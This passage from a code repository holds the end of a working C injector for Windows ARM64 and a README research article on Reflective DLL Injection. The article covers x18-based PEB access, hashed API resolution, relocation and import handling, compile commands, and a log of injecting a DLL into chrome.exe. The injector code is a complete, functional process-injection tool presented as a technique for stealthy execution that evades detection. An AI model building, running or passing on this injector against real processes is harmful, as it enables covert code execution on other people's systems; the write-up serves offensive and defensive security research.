(pOrdinals[i] >= pExportDir->NumberOfFunctions) 236 | { 237 | printf(" Ordinal %u for ReflectiveLoader is out of bounds (NumberOfFunctions: %lu).\n", pOrdinals[i], pExportDir->NumberOfFunctions); 238 | return 0; 239 | } 240 | if (pAddressesRva[pOrdinals[i]] == 0) 241 | { 242 | printf(" RVA for ReflectiveLoader function is null (Ordinal: %u).\n", pOrdinals[i]); 243 | return 0; 244 | } 245 | DWORD functionFileOffset = RvaToOffset_Injector(pAddressesRva[pOrdinals[i]], pNtHeaders, lpFileBuffer); 246 | if (functionFileOffset == 0 && pAddressesRva[pOrdinals[i]] != 0) 247 | { 248 | printf(" Failed to convert ReflectiveLoader function RVA (0x%lX) to offset.\n", pAddressesRva[pOrdinals[i]]); 249 | return 0; 250 | } 251 | return functionFileOffset; 252 | } 253 | } 254 | printf(" ReflectiveLoader export not found.\n"); 255 | return 0; 256 | } 257 | 258 | int main(int argc, char *argv[]) 259 | { 260 | DisplayBanner(); 261 | 262 | if (!IsHostARM64()) 263 | { 264 | printf(" Host Architecture: This injector is intended for ARM64 Windows.\n"); 265 | printf(" Host Architecture: Detected non-ARM64. Exiting.\n"); 266 | return 1; 267 | } 268 | else 269 | { 270 | printf(" Host Architecture: ARM64\n"); 271 | } 272 | PrintWindowsVersion(); 273 | printf("\n"); 274 | 275 | if (argc < 3) 276 | { 277 | printf(" Usage: %s \n", argv[0]); 278 | printf(" Example (PID): %s 1234 arm64_rdi.dll\n", argv[0]); 279 | printf(" Example (Name): %s Notepad.exe arm64_rdi.dll\n\n", argv[0]); 280 | return 1; 281 | } 282 | 283 | DWORD dwProcessId = 0; 284 | char *targetIdentifier = argv[1]; 285 | char *dllPath = argv[2]; 286 | BOOL isNumeric = TRUE; 287 | size_t len = strlen(targetIdentifier); 288 | 289 | for (size_t i = 0; i < len; i++) 290 | { 291 | if (!isdigit(targetIdentifier[i])) 292 | { 293 | isNumeric = FALSE; 294 | break; 295 | } 296 | } 297 | 298 | if (isNumeric) 299 | { 300 | dwProcessId = strtoul(targetIdentifier, NULL, 10); 301 | if (dwProcessId == 0) 302 | { 303 | printf(" Invalid PID '%s' provided or PID is 0.\n", targetIdentifier); 304 | return 1; 305 | } 306 | printf(" Targeting PID: %lu\n", dwProcessId); 307 | } 308 | else 309 | { 310 | printf(" Targeting process name: %s\n", targetIdentifier); 311 | dwProcessId = GetProcessIdByName(targetIdentifier); 312 | if (dwProcessId == 0) 313 | { 314 | printf(" Failed to find process '%s' or get its PID.\n", targetIdentifier); 315 | return 1; 316 | } 317 | printf(" Found PID %lu for process name '%s'\n", dwProcessId, targetIdentifier); 318 | } 319 | 320 | printf(" DLL Path: %s\n", dllPath); 321 | 322 | HANDLE hFile = CreateFileA(dllPath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 323 | if (hFile == INVALID_HANDLE_VALUE) 324 | { 325 | printf(" Failed to open DLL. Error: %lu\n", GetLastError()); 326 | return 1; 327 | } 328 | 329 | DWORD dwFileSize = GetFileSize(hFile, NULL); 330 | if (dwFileSize == INVALID_FILE_SIZE || dwFileSize == 0) 331 | { 332 | printf(" Invalid DLL size. Error: %lu\n", GetLastError()); 333 | CloseHandle(hFile); 334 | return 1; 335 | } 336 | printf(" DLL file size: %lu bytes\n", dwFileSize); 337 | 338 | LPVOID lpFileBuffer = HeapAlloc(GetProcessHeap(), 0, dwFileSize); 339 | if (!lpFileBuffer) 340 | { 341 | printf(" Failed to allocate buffer. Error: %lu\n", GetLastError()); 342 | CloseHandle(hFile); 343 | return 1; 344 | } 345 | 346 | DWORD dwBytesRead = 0; 347 | if (!ReadFile(hFile, lpFileBuffer, dwFileSize, &dwBytesRead, NULL) || dwBytesRead != dwFileSize) 348 | { 349 | printf(" Failed to read DLL. Error: %lu\n", GetLastError()); 350 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 351 | CloseHandle(hFile); 352 | return 1; 353 | } 354 | CloseHandle(hFile); 355 | hFile = NULL; 356 | printf(" DLL read into local buffer at: 0x%016llX\n", (unsigned long long)lpFileBuffer); 357 | 358 | DWORD dwReflectiveLoaderFileOffset = GetReflectiveLoaderOffset(lpFileBuffer); 359 | if (dwReflectiveLoaderFileOffset == 0) 360 | { 361 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 362 | return 1; 363 | } 364 | printf(" ReflectiveLoader file offset: 0x%lX\n", dwReflectiveLoaderFileOffset); 365 | 366 | HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId); 367 | if (!hProcess) 368 | { 369 | printf(" Failed to open target process. Error: %lu\n", GetLastError()); 370 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 371 | return 1; 372 | } 373 | printf(" Target process %lu opened. Handle: 0x%p\n", dwProcessId, hProcess); 374 | 375 | LPVOID lpRemoteMem = VirtualAllocEx(hProcess, NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 376 | if (!lpRemoteMem) 377 | { 378 | printf(" VirtualAllocEx failed. Error: %lu\n", GetLastError()); 379 | CloseHandle(hProcess); 380 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 381 | return 1; 382 | } 383 | printf(" Memory allocated in target at: 0x%016llX (Size: %lu bytes)\n", (unsigned long long)lpRemoteMem, dwFileSize); 384 | 385 | if (!WriteProcessMemory(hProcess, lpRemoteMem, lpFileBuffer, dwFileSize, NULL)) 386 | { 387 | printf(" WriteProcessMemory failed. Error: %lu\n", GetLastError()); 388 | VirtualFreeEx(hProcess, lpRemoteMem, 0, MEM_RELEASE); 389 | CloseHandle(hProcess); 390 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 391 | return 1; 392 | } 393 | printf(" DLL written to target memory at: 0x%016llX\n", (unsigned long long)lpRemoteMem); 394 | 395 | HeapFree(GetProcessHeap(), 0, lpFileBuffer); 396 | lpFileBuffer = NULL; 397 | 398 | ULONG_PTR pfnRemoteLoader = (ULONG_PTR)lpRemoteMem + dwReflectiveLoaderFileOffset; 399 | printf(" Calculated remote ReflectiveLoader: 0x%016llX\n", (unsigned long long)pfnRemoteLoader); 400 | 401 | HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnRemoteLoader, NULL, 0, NULL); 402 | if (!hRemoteThread) 403 | { 404 | printf(" CreateRemoteThread failed. Error: %lu\n", GetLastError()); 405 | VirtualFreeEx(hProcess, lpRemoteMem, 0, MEM_RELEASE); 406 | CloseHandle(hProcess); 407 | return 1; 408 | } 409 | printf(" Remote thread created (Handle: 0x%p). Waiting...\n", hRemoteThread); 410 | 411 | WaitForSingleObject(hRemoteThread, INFINITE); 412 | printf(" Remote thread completed.\n"); 413 | 414 | DWORD dwExitCode = 0; 415 | GetExitCodeThread(hRemoteThread, &dwExitCode); 416 | printf(" Remote thread exit code: 0x%08lX\n", dwExitCode); 417 | 418 | CloseHandle(hRemoteThread); 419 | CloseHandle(hProcess); 420 | 421 | printf("\n Injection process finished.\n"); 422 | return 0; 423 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Reflective DLL Injection on Windows ARM64 2 | 3 | ## Quick Summary / TL;DR 4 | 5 | This project demonstrates a functional Proof-of-Concept for Reflective DLL Injection (RDI) on Windows ARM64. Key to this is leveraging the `x18` register to access the Thread Environment Block (TEB) and subsequently the Process Environment Block (PEB), a method confirmed via WinDbg and Microsoft's ARM64 ABI documentation. The PoC, developed and tested on a Surface Pro 11 (ARM64), includes a basic injector and a reflective DLL, adapting Stephen Fewer's original RDI principles to the ARM64 architecture. This work aims to fill a gap in publicly available research for this specific technique on ARM64. 6 | 7 | ![image](https://github.com/user-attachments/assets/6cedde0f-8092-4031-bf00-020b688f4d74) 8 | 9 | 10 | ## Abstract 11 | 12 | Reflective DLL Injection (RDI) is a well-documented technique for loading Dynamic Link Libraries (DLLs) into a process's memory from a memory buffer, bypassing conventional disk-based loading mechanisms. While extensively analyzed and utilized on x86 and x64 Windows architectures, its application and detailed public documentation for the Windows on ARM64 platform have been notably limited, with very little readily accessible research specifically addressing RDI on this architecture. This article details the process of adapting and implementing RDI for ARM64, focusing on the architectural nuances required for self-location and API resolution by the reflective loader. We present key findings from Windows Debugger (WinDbg) analysis regarding ARM64's Thread Environment Block (TEB) and Process Environment Block (PEB) access, and demonstrate a functional proof-of-concept. The implications for offensive security practitioners and defensive strategies on the ARM64 platform are also discussed. 13 | 14 | ## 1. Introduction 15 | 16 | The Windows on ARM64 platform represents a significant and expanding segment of the computing ecosystem. As this architecture gains traction, particularly with devices like my own Surface Pro 11, the need for security researchers and practitioners to understand its low-level behavior and adapt existing tradecraft becomes increasingly critical. Reflective DLL Injection, originally popularized by [Stephen Fewer](https://github.com/stephenfewer/ReflectiveDLLInjection), offers a potent method for stealthy code execution by manually mapping a DLL within a target process's address space. This technique avoids standard Windows loader events associated with disk-based module loading, thereby evading many traditional detection methods. 17 | 18 | Despite its utility, publicly available research and tooling for RDI specifically tailored to ARM64 Windows systems are non-existent (as far as I know). While individual components or concepts may have been touched upon, a cohesive, end-to-end public demonstration and explanation of RDI on ARM64 has been elusive. This article aims to contribute to bridging this gap by detailing the necessary architectural adaptations and providing a clear methodology for achieving RDI on this platform. My approach involves leveraging WinDbg for system introspection and constructing an ARM64-specific reflective loader by adapting established RDI principles. 19 | 20 | ## 2. Background: Reflective DLL Injection Principles 21 | 22 | The core of RDI is the `ReflectiveLoader` function, a position-independent code segment exported by the DLL intended for injection. Once the DLL's raw image is written into the target process's memory and execution is transferred to the `ReflectiveLoader` (e.g., via `CreateRemoteThread`), it performs the following critical operations: 23 | 24 | 1. **Self-Location:** Determines its own current base address in the target process's memory. 25 | 2. **API Resolution:** Dynamically locates the addresses of essential Windows API functions (e.g., `LoadLibraryA`, `GetProcAddress`, `VirtualAlloc`, `NtFlushInstructionCache`) without relying on its own, yet unprocessed, import table. This typically involves navigating the Process Environment Block (PEB) to find loaded system modules like `kernel32.dll` and `ntdll.dll`. 26 | 3. **Memory Allocation:** Allocates a new, suitably sized memory region within the target process with execute, read, and write (RWX) permissions. 27 | 4. **PE Image Mapping:** Copies its own PE headers and sections from its initial location to the newly allocated memory region. 28 | 5. **Relocation Processing:** Applies any necessary base relocations to correct absolute addresses within its code and data sections, as the new memory region is unlikely to match the DLL's preferred image base. 29 | 6. **Import Address Table (IAT) Resolution:** Parses its own import directory, loads required dependent DLLs using the resolved `LoadLibraryA`, and populates its IAT with the addresses of imported functions obtained via the resolved `GetProcAddress`. 30 | 7. **Execution Transfer:** Calls the DLL's actual entry point (typically `DllMain`) with the `DLL_PROCESS_ATTACH` reason. 31 | 32 | The primary challenge in porting RDI to a new architecture like ARM64 lies in the API resolution phase, specifically how the TEB and PEB are accessed to enumerate loaded modules. 33 | 34 | ## 3. ARM64 Architectural Considerations for PEB Access 35 | 36 | On x86 and x64 architectures, the TEB is typically accessed via the `FS` and `GS` segment registers, respectively. The PEB pointer is then found at a fixed offset within the TEB. ARM64 does not utilize segment registers in this manner, necessitating a different approach for locating these critical structures. 37 | 38 | This investigation began by consulting official documentation. Microsoft's [Overview of ARM64 ABI conventions](https://learn.microsoft.com/en-us/cpp/build/arm64-windows-abi-conventions?view=msvc-170) provides crucial details regarding the architecture's register usage. Within this documentation, under the "Integer registers" section, a key piece of information is provided for the `x18` register: 39 | 40 | > `x18 N/A Reserved platform register: in kernel mode, points to KPCR for the current processor; In user mode, points to TEB` 41 | 42 | This statement directly identifies the `x18` register as the user-mode pointer to the Thread Environment Block (TEB) on ARM64. This was the architectural equivalent we were seeking to replace the FS/GS segment register mechanism. 43 | 44 | To verify this and determine the subsequent offset to the Process Environment Block (PEB), we utilized the Windows Debugger (WinDbg) attached to an ARM64 user-mode process (Notepad.exe). 45 | 46 | The `!teb` WinDbg command confirmed the presence of the TEB and its `PEB Address` field in ARM64 processes: 47 | 48 | ```text 49 | 0:026> !teb 50 | TEB at 000000347f391000 51 | ... 52 | PEB Address: 000000347f35a000 53 | ... 54 | ``` 55 | 56 | With the TEB's base address known (obtainable programmatically via `x18`), further inspection of the TEB structure using `dt ntdll!_TEB ` revealed the offset of the `ProcessEnvironmentBlock` (PEB pointer) member: 57 | 58 | ```text 59 | +0x060 ProcessEnvironmentBlock : 0x00000034`7f35a000 _PEB 60 | ``` 61 | 62 | This debugging output, combined with the ABI documentation, confirmed that on ARM64, the PEB pointer can be retrieved by reading the value of the `x18` register (which gives the TEB base) and then dereferencing the memory location `TEB_BASE + 0x60`. ARM64 C/C++ compilers provide [ARM64 intrinsics](https://learn.microsoft.com/en-us/cpp/intrinsics/arm64-intrinsics?view=msvc-170) such as `__readx18qword()` to facilitate access to such registers, enabling the following C code pattern within the reflective loader: 63 | 64 | ```c 65 | ULONG_PTR uiPeb; 66 | uiPeb = __readx18qword(0x60); // Reads PEB pointer from TEB_BASE (X18) + 0x60 67 | ``` 68 | 69 | ## 4. Implementing the ARM64 Reflective Loader 70 | 71 | With the PEB access mechanism for ARM64 identified as `__readx18qword(0x60)`, the construction of the `ReflectiveLoader` could proceed, adapting established RDI principles to the ARM64 architecture. The loader is designed as a position-independent function, typically exported by the DLL intended for injection. 72 | 73 | Key implementation details include: 74 | 75 | - **4.1. Self-Location and Initial API Pointer Acquisition:** 76 | The loader first determines its own base address in memory. A common technique involves calling a non-inlined function that returns the address of its caller via an intrinsic like `_ReturnAddress()`. Once its own base is known, the loader can parse its own PE headers. The critical `__readx18qword(0x60)` intrinsic is then used to retrieve the PEB address. From the PEB, the loader navigates to `PEB->Ldr->InMemoryOrderModuleList` to begin enumerating loaded system DLLs, primarily seeking `kernel32.dll` and `ntdll.dll`. 77 | 78 | - **4.2. Hashing Algorithms for API Resolution:** 79 | To dynamically resolve API functions without relying on its own (yet unprocessed) import table, hashing is employed. Pre-calculated hash values for essential functions (`LoadLibraryA`, `GetProcAddress`, `VirtualAlloc`, `NtFlushInstructionCache`) and their respective DLLs (`kernel32.dll`, `ntdll.dll`) are stored within the loader. 80 | 81 | - _Module Name Hashing_: It was found that the hashing algorithm for module names (derived from `UNICODE_STRING.BaseDllName` in the PEB's LDR data) needed to precisely replicate the byte-wise processing and ASCII-centric uppercasing used in many original RDI implementations to match the pre-calculated `KERNEL32DLL_HASH` and `NTDLLDLL_HASH`. The `UNICODE_STRING.Length` field (in bytes) is used as the counter. 82 | 83 | ```c 84 | // Simplified excerpt of module name hashing within the ReflectiveLoader 85 | // pEntry is a PLDR_DATA_TABLE_ENTRY_LDR 86 | // dwModuleHash is the accumulator, ror_dword_loader performs bitwise rotation 87 | if (pEntry->BaseDllName.Length > 0 && pEntry->BaseDllName.Buffer != NULL) { 88 | USHORT usCounter = pEntry->BaseDllName.Length; // Length in bytes 89 | BYTE *pNameByte = (BYTE*)pEntry->BaseDllName.Buffer; 90 | 91 | do { 92 | dwModuleHash = ror_dword_loader(dwModuleHash); 93 | if (*pNameByte >= 'a' && *pNameByte <= 'z') { // Byte-level ASCII check 94 | dwModuleHash += (*pNameByte - 0x20); // Uppercase if lowercase ASCII 95 | } else { 96 | dwModuleHash += *pNameByte; // Add byte as is 97 | } 98 | pNameByte++; 99 | } while (--usCounter); 100 | // Compare dwModuleHash with KERNEL32DLL_HASH or NTDLLDLL_HASH 101 | } 102 | ``` 103 | 104 | - _Function Name Hashing_: Similarly, function names exported by `kernel32.dll` and `ntdll.dll` are iterated, hashed, and compared against target hashes. The effective algorithm for function names often involves a rotation and sum of direct character ASCII values. 105 | 106 | ```c 107 | // Simplified excerpt of function name hashing within the ReflectiveLoader 108 | // c points to a char* function name, h is the accumulator 109 | do { 110 | h = ror_dword_loader(h); // _rotr based rotation 111 | h += *c; // Sum of ASCII character values 112 | } while (*++c); 113 | // Compare h with LOADLIBRARYA_HASH, GETPROCADDRESS_HASH, etc. 114 | ``` 115 | 116 | Once the base addresses of `kernel32.dll` and `ntdll.dll` are found, their export address tables (EATs) are parsed. The `AddressOfNames`, `AddressOfNameOrdinals`, and `AddressOfFunctions` arrays are used in conjunction with the hashing mechanism to locate the Virtual Addresses (VAs) of the required API functions. 117 | 118 | - **4.3. Memory Allocation and PE Image Mapping:** 119 | Using the dynamically resolved pointer to `VirtualAlloc`, the loader allocates a new memory region within the target process. This region is typically marked with `PAGE_EXECUTE_READWRITE` permissions and sized according to `SizeOfImage` from its own PE header. The loader then meticulously copies its own PE headers (`OptionalHeader.SizeOfHeaders`) and each section (`IMAGE_SECTION_HEADER`) from its initial, temporary location in memory to their respective virtual addresses within this newly allocated image base. 120 | 121 | - **4.4. Relocation Processing:** 122 | Since the DLL is unlikely to be loaded at its preferred `OptionalHeader.ImageBase`, base relocations must be processed. The loader calculates the delta between the new actual image base and the preferred image base. It then iterates through the relocation blocks found via the `IMAGE_DIRECTORY_ENTRY_BASERELOC` data directory. For ARM64, `IMAGE_REL_BASED_DIR64` is the predominant relocation type, requiring the 64-bit delta to be added to the value at the specified offset within the image. 123 | 124 | ```c 125 | // Simplified excerpt of IMAGE_REL_BASED_DIR64 relocation handling 126 | // uiNewImageBase is the actual base, uiDelta is (uiNewImageBase - pOldNtHeaders->OptionalHeader.ImageBase) 127 | // pRelocBlock points to the current IMAGE_BASE_RELOCATION block 128 | // pRelocEntry points to the current IMAGE_RELOC_LDR entry 129 | if (pRelocEntry[k].type == IMAGE_REL_BASED_DIR64) { 130 | *(ULONG_PTR*)(uiNewImageBase + pRelocBlock->VirtualAddress + pRelocEntry[k].offset) += uiDelta; 131 | } 132 | ``` 133 | 134 | - **4.5. Import Address Table (IAT) Resolution:** 135 | The loader parses its own `IMAGE_DIRECTORY_ENTRY_IMPORT` data directory. For each `IMAGE_IMPORT_DESCRIPTOR`, it uses the resolved `LoadLibraryA` to load the required dependent DLL into the target process's address space. Then, for each imported function (iterating through the `OriginalFirstThunk` or `FirstThunk`), it uses the resolved `GetProcAddress` (using either the function name or ordinal) to find the function's address in the now-loaded dependent module. This address is then written into the corresponding entry in the `FirstThunk` array, effectively populating the IAT. 136 | 137 | - **4.6. Execution Transfer and Cleanup:** 138 | Before transferring execution to the DLL's actual entry point (e.g., `PayloadDllMain`), `NtFlushInstructionCache` is called. This is crucial on architectures like ARM where instruction caching might lead to stale instructions being executed after relocations or IAT patching. The call is typically `fnNtFlushInstructionCache((HANDLE)-1, NULL, 0)` to flush the cache for the current process. Finally, the DLL's entry point is called with `DLL_PROCESS_ATTACH` and any parameters passed to the `ReflectiveLoader`. 139 | 140 | The remaining steps of the loader, such as detailed PE structure definitions for internal parsing (e.g., `_PEB_LDR_DATA_LDR`, `_LDR_DATA_TABLE_ENTRY_LDR`), are essential for correct navigation and interpretation of process memory but follow established patterns adapted for 64-bit types. 141 | 142 | ## 5. Experimental Validation 143 | 144 | A proof-of-concept was developed consisting of an ARM64 injector executable and an ARM64 reflective DLL. The DLL's `PayloadDllMain` was programmed to display a `MessageBoxA` upon successful loading. The injector, enhanced with a user-friendly banner and the ability to target processes by name or PID, performed the following sequence: 145 | 146 | 1. Read the reflective DLL from disk into a memory buffer. 147 | 2. Parsed the DLL's PE structure to locate the file offset of the exported `ReflectiveLoader` function. 148 | 3. Obtained a handle to the target ARM64 process. 149 | 4. Allocated RWX memory in the target process using `VirtualAllocEx`. 150 | 5. Wrote the DLL's buffered image into the allocated remote memory using `WriteProcessMemory`. 151 | 6. Calculated the absolute address of `ReflectiveLoader` within the target process's address space. 152 | 7. Initiated execution of `ReflectiveLoader` via `CreateRemoteThread`. 153 | 154 | Successful execution was confirmed by the appearance of the MessageBoxA from the injected DLL. The injector output below demonstrates a successful injection into `chrome.exe` on a Windows 11 ARM64 system (Build 26200): 155 | 156 | ```text 157 | C:\Users\ah\Documents\GitHub\ReflectiveDLLInjection_ARM64>arm64_injector.exe chrome.exe arm64_rdi.dll 158 | ===================================================================== 159 | | Reflective DLL Injection on Windows ARM64 | 160 | | By @xaitax | 161 | ===================================================================== 162 | 163 | Host Architecture: ARM64 164 | Host OS: Windows 11 (Build 26200) 165 | 166 | Targeting process name: chrome.exe 167 | Found PID 20352 for process name 'chrome.exe' 168 | DLL Path: arm64_rdi.dll 169 | DLL file size: 6144 bytes 170 | DLL read into local buffer at: 0x0000024699117260 171 | ReflectiveLoader file offset: 0x538 172 | Target process 20352 opened. Handle: 0x00000000000000AC 173 | Memory allocated in target at: 0x000002BE69740000 (Size: 6144 bytes) 174 | DLL written to target memory at: 0x000002BE69740000 175 | Calculated remote ReflectiveLoader: 0x000002BE69740538 176 | Remote thread created (Handle: 0x00000000000000B0). Waiting... 177 | Remote thread completed. 178 | Remote thread exit code: 0x69750000 179 | 180 | Injection process finished. 181 | ``` 182 | 183 | The remote thread exit code (`0x69750000` in this instance, corresponding to `0x000002BE69740000`) represents the base address where the reflective loader successfully mapped the DLL in the target process. 184 | 185 | ### 6. Code Availability and Compilation 186 | 187 | The proof-of-concept code demonstrating the ARM64 Reflective DLL Injection technique discussed in this article, including the injector and the reflective DLL (comprising the loader and payload), is available in this [GitHub repository](https://github.com/xaitax/ARM64-ReflectiveDLLInjection). 188 | 189 | To compile this code, an ARM64 C/C++ development environment is required. For Windows, this typically involves using Microsoft Visual Studio with the ARM64 build tools installed. Compilation should be performed from an "ARM64 Native Tools Command Prompt" or a development environment correctly configured for ARM64 cross-compilation. 190 | 191 | **Example Compilation Commands (using MSVC `cl.exe`):** 192 | 193 | 1. **Compile the Reflective DLL (e.g., `arm64_rdi.dll`):** 194 | The DLL must export the `ReflectiveLoader` function and link necessary libraries for its payload (e.g., `User32.lib` if `MessageBoxA` is used). The DLL's entry point for the reflective loader will be the payload's `DllMain` (e.g., `PayloadDllMain`). 195 | 196 | ```batch 197 | cl /LD /Fe:arm64_rdi.dll arm64_dll.c arm64_reflective_loader.c User32.lib /link /ENTRY:PayloadDllMain /DLL 198 | ``` 199 | 200 | - `/LD`: Create a DLL. 201 | - `/Fe:filename`: Specify the output DLL name. 202 | - `User32.lib`: Example library for `MessageBoxA`. 203 | - `/link /ENTRY:functionName`: Sets the DLL's entry point. 204 | - `/DLL`: Specifies that a DLL is to be built. 205 | 206 | 2. **Compile the Injector Executable (e.g., `arm64_injector.exe`):** 207 | 208 | ```batch 209 | cl arm64_injector.c /Fe:arm64_injector.exe Kernel32.lib 210 | ``` 211 | 212 | - `Kernel32.lib`: Typically linked by default but can be specified for clarity for functions like `CreateFileA`, `OpenProcess`, etc. 213 | 214 | Users should adapt these commands based on their specific source file names and project structure. Ensure that the target architecture in the compiler and linker settings is explicitly set to ARM64. 215 | 216 | ## 7. Conclusion 217 | 218 | This research demonstrates that Reflective DLL Injection is a viable and effective technique on the Windows on ARM64 platform. By identifying the ARM64-specific mechanism for TEB/PEB access (`x18` register and `+0x60` offset) and carefully adapting hashing and PE processing logic, a functional RDI implementation was achieved. 219 | 220 | As ARM64 Windows systems become more integrated into the computing landscape, both offensive and defensive security practitioners must adapt their tools and methodologies accordingly. While this work provides a foundational proof-of-concept, further development could incorporate more advanced features such as SEH setup and support for a wider range of PE features to create more robust and versatile ARM64 RDI solutions. 221 | 222 | ## 8. References 223 | 224 | - Microsoft Corporation. [Overview of ARM64 ABI conventions](https://learn.microsoft.com/en-us/cpp/build/arm64-windows-abi-conventions?view=msvc-170) 225 | - Microsoft Corporation. [ARM64 intrinsics](https://learn.microsoft.com/en-us/cpp/intrinsics/arm64-intrinsics?view=msvc-170) 226 | - Fewer, Stephen. [Reflective DLL Injection](https://github.com/stephenfewer/ReflectiveDLLInjection) 227 | --------------------------------------------------------------------------------